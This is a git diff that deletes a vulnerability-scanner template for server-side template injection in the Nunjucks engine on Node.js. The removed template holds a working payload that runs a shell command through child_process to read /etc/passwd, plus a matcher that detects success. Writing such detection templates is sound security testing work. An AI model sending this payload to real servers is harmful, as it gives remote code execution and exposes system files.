Delete node-nunjucks-ssti.yaml
parent
d3a379e112
commit
d45887f9f9
|
@ -1,23 +0,0 @@
|
|||
id: node-nunjucks-ssti
|
||||
|
||||
info:
|
||||
name: Node Nunjucks SSTI
|
||||
description: Nunjucks is a template engine for by Jinja2 used to develop web applications on Node.js web frameworks as Express or Connect.
|
||||
reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: node,nunjucks,ssti
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue